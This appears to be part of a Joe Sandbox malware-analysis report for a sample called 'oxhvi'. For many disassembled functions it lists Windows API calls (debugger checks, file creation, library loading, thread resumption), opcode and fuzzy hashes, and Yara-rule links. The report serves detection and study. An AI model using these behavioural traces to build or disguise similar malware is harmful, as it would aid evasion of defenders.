                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                      • String ID: CALL
                                                                                                                                                      • API String ID: 1385522511-4196123274
                                                                                                                                                      • Opcode ID: 8b4d7170622bd37e1b366f9f11d86ed3712ecd91e4a99694a0ee87f3266bc310
                                                                                                                                                      • Instruction ID: e3e4c48dbc57a36ed4d2fc02285b8f396f4aaf3b2bf513670db8131ae26ed124
                                                                                                                                                      • Opcode Fuzzy Hash: 8b4d7170622bd37e1b366f9f11d86ed3712ecd91e4a99694a0ee87f3266bc310
                                                                                                                                                      • Instruction Fuzzy Hash: FD229A706082029FC714DF14C885B6ABFF5BF88318F64895DF8969B3A2D731E945CB82
                                                                                                                                                      Function 00541940 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6ae254268db8501d5d4c2007c61ab105dd10e8e0d939f2feb79c6bf0ec902fc4
                                                                                                                                                      • Instruction ID: b98e3fac5125c53710a87e2ab1ba855d8e3a1a9317890896d0b322ab5b756c7a
                                                                                                                                                      • Opcode Fuzzy Hash: 6ae254268db8501d5d4c2007c61ab105dd10e8e0d939f2feb79c6bf0ec902fc4
                                                                                                                                                      • Instruction Fuzzy Hash: 8132DE30A00A069FDB20EF54D899BAEBFB5FF41318F144919EC55AB2A1D731AD84CB81
                                                                                                                                                      Function 005341E6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005333E9,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00534227
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePath_wcslen
                                                                                                                                                      • String ID: $`
                                                                                                                                                      • API String ID: 4019309064-1483412578
                                                                                                                                                      • Opcode ID: c8e5e73422db03f3b5a8e6c031517b55d91c83596e123da5555a5f76a4675201
                                                                                                                                                      • Instruction ID: 6be8cadbfb2394bacf48cd158655b42811977653545f7cca1f06f3be9696baab
                                                                                                                                                      • Opcode Fuzzy Hash: c8e5e73422db03f3b5a8e6c031517b55d91c83596e123da5555a5f76a4675201
                                                                                                                                                      • Instruction Fuzzy Hash: F711A53550020A9BCF05EBA4D909EDE7FF9BF48344F004465B985E3281EE74E7849F21
                                                                                                                                                      Function 0058E6E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetComputerNameW.KERNEL32(?,?), ref: 0058E6F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                      • String ID: X64
                                                                                                                                                      • API String ID: 3545744682-893830106
                                                                                                                                                      • Opcode ID: e68627ae599343ee031f8914cbb3ae0c66fd5a845ec7762daa9190996f4714fd
                                                                                                                                                      • Instruction ID: d4f4a512502670205abe8523aa5146798af68dd036eb0813fdcbec844bc6e7a6
                                                                                                                                                      • Opcode Fuzzy Hash: e68627ae599343ee031f8914cbb3ae0c66fd5a845ec7762daa9190996f4714fd
                                                                                                                                                      • Instruction Fuzzy Hash: 26D0C9B4805218EACF90EF80EC89DDDBB7CBB14304F100C65F902F2000EB7465489B20
                                                                                                                                                      Function 005A95F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 005A9665
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005A9673
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3876400906-0
                                                                                                                                                      • Opcode ID: 8ee645d14444b10c1fac9cfe636d1655c6620740035a84864ff1aeb3f3d82897
                                                                                                                                                      • Instruction ID: f849437003c9e7df9de36c114f6f56208b9f7bf6d0c9036c027190a2512922d0
                                                                                                                                                      • Opcode Fuzzy Hash: 8ee645d14444b10c1fac9cfe636d1655c6620740035a84864ff1aeb3f3d82897
                                                                                                                                                      • Instruction Fuzzy Hash: 17111C79600A269FDB04EB64C845D6EBBF9FF88360B058854F856AB361CB30FD01DB90
                                                                                                                                                      Function 00536E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 00536E80
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 005759A2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 9756236c84e79b52544a25e79e7d29aa369761b73437e77547cd505ae44fbd5c
                                                                                                                                                      • Instruction ID: d69423a0ddd6e7e0031df0c1ffc9f4fe6dee15050ce434c432d687fce130edd2
                                                                                                                                                      • Opcode Fuzzy Hash: 9756236c84e79b52544a25e79e7d29aa369761b73437e77547cd505ae44fbd5c
                                                                                                                                                      • Instruction Fuzzy Hash: 1E015231145625BAE3310A26CC0EF977F98FF06B74F14C314BE99AA1E0C7B45859DB90
                                                                                                                                                      Function 005332A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • IsThemeActive.UXTHEME ref: 005332C4
                                                                                                                                                        • Part of subcall function 0053326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00533282
                                                                                                                                                        • Part of subcall function 0053326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00533299
                                                                                                                                                        • Part of subcall function 00533312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005332EF,?), ref: 00533342
                                                                                                                                                        • Part of subcall function 00533312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005332EF,?), ref: 00533355
                                                                                                                                                        • Part of subcall function 00533312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00602418,00602400,?,?,?,?,?,?,005332EF,?), ref: 005333C1
                                                                                                                                                        • Part of subcall function 00533312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00533442
                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 005332FE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1550534281-0
                                                                                                                                                      • Opcode ID: eeac945e468a41f3980664579054747dbfdb13e21e340429359d0521d07b88f7
                                                                                                                                                      • Instruction ID: f71b78f472f34588b0d059c841312d4d1706639db1379fa57de78022b4eefcdf
                                                                                                                                                      • Opcode Fuzzy Hash: eeac945e468a41f3980664579054747dbfdb13e21e340429359d0521d07b88f7
                                                                                                                                                      • Instruction Fuzzy Hash: 04F0E271584B569FE709AF60EC2EB263FA1FB00306F009C16F509850F2DFB98455DB00
                                                                                                                                                      Function 0054F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                      • Opcode ID: 93c971176ee66afafd405f6bd66361c837a08087bf9948300711e66a674f4738
                                                                                                                                                      • Instruction ID: fa3770b924ffb0c812f6c647cc3d9a6fc7a6bacf193d24f308fbb60001e68e88
                                                                                                                                                      • Opcode Fuzzy Hash: 93c971176ee66afafd405f6bd66361c837a08087bf9948300711e66a674f4738
                                                                                                                                                      • Instruction Fuzzy Hash: FEF082712406069FC314EB69D449F56BFF9FF98361F004429E85AD7250DB70B800CBA1
                                                                                                                                                      Function 005594D1 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0056506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,005F9C08,00000010,005594DE), ref: 005650CC
                                                                                                                                                        • Part of subcall function 0056506A: _free.LIBCMT ref: 005650DA
                                                                                                                                                        • Part of subcall function 0056510A: _free.LIBCMT ref: 0056512C
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(-00000020), ref: 005594FA
                                                                                                                                                      • _free.LIBCMT ref: 0055950E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$CriticalDeleteSection
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1906768660-0
                                                                                                                                                      • Opcode ID: c3437cfb64801d535ef897d18f3528c84c64a6bdf563d3172782915677f2bd48
                                                                                                                                                      • Instruction ID: 9f5f235327b65466ef71b9193e4cbc5cbd915e612db7263df1863590fc39e623
                                                                                                                                                      • Opcode Fuzzy Hash: c3437cfb64801d535ef897d18f3528c84c64a6bdf563d3172782915677f2bd48
                                                                                                                                                      • Instruction Fuzzy Hash: B1E0DF328508108BC7217768FC1AA1A3BA5FB8B360F05041BF80097020DF25AC468645
                                                                                                                                                      Function 00538774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0053AE65,?,?,?), ref: 00538793
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0053AE65,?,?,?), ref: 005387C9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                      • Opcode ID: 7de6efe2ec007a4af10520e3acf6816baa1cc5a9c30b6c8b9bddcd5b1096082b
                                                                                                                                                      • Instruction ID: fec2604edaa03ab8736f5477fe41df7dd6fec3518e147d49a08e9b2fce940c05
                                                                                                                                                      • Opcode Fuzzy Hash: 7de6efe2ec007a4af10520e3acf6816baa1cc5a9c30b6c8b9bddcd5b1096082b
                                                                                                                                                      • Instruction Fuzzy Hash: 5001BC713012057FEB1CAB6A9D4AF7F7FAAEBC4340F14003EB502DA1D0EEA1AC009224
                                                                                                                                                      Function 0055F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c6410a5ee2d62a272db51bcd8b8a7da3192337e716e9c8182f8e824980ba0804
                                                                                                                                                      • Instruction ID: 92a132e9dda57f7a85f324cfa58dceb2437424ba8245328426f7f74923188f5f
                                                                                                                                                      • Opcode Fuzzy Hash: c6410a5ee2d62a272db51bcd8b8a7da3192337e716e9c8182f8e824980ba0804
                                                                                                                                                      • Instruction Fuzzy Hash: 0B51E6B9A00104AFDB10CF68CC64A697FB1FB85365F19816AEC089B391C731ED46CB90
                                                                                                                                                      Function 0059FBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0059FBE3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                      • Opcode ID: f99188e240df1ac0d1d2ce94b233db9ddb0ec0c36e48d12b7e01b8df412a46ac
                                                                                                                                                      • Instruction ID: d89824f84e14a87df566d7f592d4a40bb80a07f26fc5d9961bf5ef928347f018
                                                                                                                                                      • Opcode Fuzzy Hash: f99188e240df1ac0d1d2ce94b233db9ddb0ec0c36e48d12b7e01b8df412a46ac
                                                                                                                                                      • Instruction Fuzzy Hash: 2C4182B6600209AFDF15AF64C8859AE7BB8FF84314B15893EE916D7241EB70DE44CB50
                                                                                                                                                      Function 00550000 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                      • Instruction ID: 55ef4789b4fdbb6b295b62391749561a88208a8b226b7eb2bdbe2f4bca2236dc
                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                      • Instruction Fuzzy Hash: DC31EA70600105DFCB18DF58C4A8A69FBA1FB49301BA496A6E80ACB6E5D731EDC5CBD0
                                                                                                                                                      Function 005A8E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 005A8EBE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePathPrivateProfileString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1991638491-0
                                                                                                                                                      • Opcode ID: fc9798cc38cfe2de7ec33a0d0cb592fe570f9feff281d402ba1e1d1aa186ac22
                                                                                                                                                      • Instruction ID: bcee142f5ab914637222eab1abfa8c6106da6517faac36ba7357e8a828bccf68
                                                                                                                                                      • Opcode Fuzzy Hash: fc9798cc38cfe2de7ec33a0d0cb592fe570f9feff281d402ba1e1d1aa186ac22
                                                                                                                                                      • Instruction Fuzzy Hash: AB213E35600A06AFCB04EB64C94ACAEBBB5FF89360F044054FA45AB3A1CB30FD45DB90
                                                                                                                                                      Function 0053636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00536332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 0053633E
                                                                                                                                                        • Part of subcall function 00536332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00536350
                                                                                                                                                        • Part of subcall function 00536332: FreeLibrary.KERNEL32(00000000,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536362
                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005360AA,?,00000001,?,?,00000000), ref: 0053639F
                                                                                                                                                        • Part of subcall function 005362FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536304
                                                                                                                                                        • Part of subcall function 005362FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00536316
                                                                                                                                                        • Part of subcall function 005362FB: FreeLibrary.KERNEL32(00000000,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536329
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
